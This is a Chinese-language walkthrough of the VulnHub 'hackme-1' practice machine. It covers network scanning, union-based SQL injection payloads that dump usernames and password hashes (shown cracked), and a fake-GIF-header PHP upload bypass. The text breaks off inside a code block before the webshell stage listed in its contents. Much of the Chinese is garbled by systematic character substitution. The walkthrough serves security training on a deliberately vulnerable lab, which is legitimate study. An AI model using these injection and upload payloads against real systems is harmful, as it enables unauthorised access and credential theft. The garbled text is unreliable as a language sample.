靶机渗透 hackme-1（详解，适合新手）

谁暖过我心窝

靶机hackme-1的目录

• 0x01靶机形貌
  
• 0x02状况拆建
  
• 0x03靶机浸透
  
• 
  
  
  
  • 1、 疑息搜集
    
  • 2、 破绽发掘
    
  • 
    
    
    
    • SQL注进
      
    • 文件上传破绽
      
       
    
  • 3、 破绽操纵
    
  • 
    
    
    
    • 反弹shell办法一：一句话木马，蚁剑毗连
      
    • 反弹shell办法两：system号令施行
      
       
    
  • 4、 提权
    
    
  
• 0x04尝试总结
  

0x01靶机形貌

靶机底子疑息：
链接https://www.vulnhub.com/entry/hackme-1,330/公布工夫18 Jul 2019做者x4bx54易度简朴靶机底子引见：

“hackme”是一个初教者易度等级框。目的是经由过程web破绽得到有限的权限会见，然后权限晋级为root。那个尝试室是为了模仿实践糊口状况而创立的。
“hackme”利用DHCP，而且正在mysqld大要自止封闭的状况下（十分稀有的状况），尝试强迫从头启念头器，然后机械该当能够一般事情。
取VMware比拟，VirtualBox的结果更好
0x02状况拆建

• 下载并导进靶机
  翻开vmware–文件–翻开–hackme.ova
  
  
  
  
  
  
  
• 检察收集适配器
  将靶机收集适配器改成NAT形式
  
  
  
  
• 启动靶机
  面击 ▶靶机，开启胜利
  
  
  
  

0x03靶机浸透

1、 疑息搜集

• 主机发明
  

1. arpscan -l

复造代码

• 端心扫描
  

1. masscan --rate=100000 -p 0-65535 192.168.30.207

复造代码

• 具体扫描
  

1. nmap -T4 -sV -O -p 22,80 192.168.30.207

复造代码

• 目录扫描
  (1) dirb目录扫描
  

1. dirb http://192.168.30.207 /usr/share/dirb/wordlists/big.txt

复造代码

（2）gobuster目录扫描

1. gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.207 -t 30

复造代码

• 网站指纹辨认
  

1. whatweb http://192.168.30.207

复造代码

2、 破绽发掘

• SQL注进
  

• 登录主页发明登录页里，并且借能够注册用户
  
  
  
  
• 注册用户admin 密码123456
  
  
  
  
• 登录admin用户
  
  
  
  单击search能够停止检察到许多的书名
  
  
  
  
• 考证sql注进
  

1. Windows OS' and 1=1#

复造代码

1. Windows OS' and 1=2#

复造代码

由以上考证出此处存正在字符型(单引号)sql注进

• 判定字段数
  

1. Windows OS' order by 3#

复造代码

1. Windows OS' order by 4#

复造代码

能够看出那里字段数为3

• 判定显现地位
  

1. -1' union select 1,2,3#

复造代码

• 检察当前数据库
  

1. -1' union select database(),2,3#

复造代码

• 检察webapphacking库一切的表
  

1. -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

复造代码

• 检察users表中一切的列
  

1. -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

复造代码

10.检察表中user,password

1. -1' union select group_concat(user),group_concat(pasword),3 from users#

复造代码

• 将获得密码停止MD5解稀
  

1. user1           5d41402abc4b2a76b9719d911017c592    hello
2. user2           6269c4f71a55b24bad0f0267d9be5508    commando
3. user3            0f359740bd1cda994f8b55330c86d845    p@ssw0rd
4. test            05a671c66aefea124cc08b76ea6d30bb        testtest
5. superadmin        2386acb2cf356944177746fc92523983        Uncrackable
6. test1           05a671c66aefea124cc08b76ea6d30bb        testtest
7. admin           e10adc3949ba59abbe56e057f20f883e        123456
8. 123456            e10adc3949ba59abbe56e057f20f883e        123456

复造代码

那里只截了三张图，其他的解稀也一样，前面两个用户（admin,123456）是我本人方才正在网页注册的

• 文件上传破绽
  

• 利用superadmin用户登录
  
  
  
  
• 发明文件上传面
  

• 上传phpinfo()停止考证
  

建造假图片头

1. GIF89a<?php phpinfo(); ?>

复造代码

上传前先开启burp抓包

• 阻拦-修正后缀-send，我们能够从回包中看出文件已将上传至文件夹
  

• 疑息搜集时，目录扫描出的途径
  

1. http://192.168.30.207/uploads/
2. 会见途径
3. http://192.168.30.207/uploads/phpinfo.php

复造代码

该上传面存正在文件上传破绽，而且假图片头取图片马都可以
3、 破绽操纵

反弹shell办法一：一句话木马，蚁剑毗连

• 建造图片马
  

[code]<span class="token delimiter important">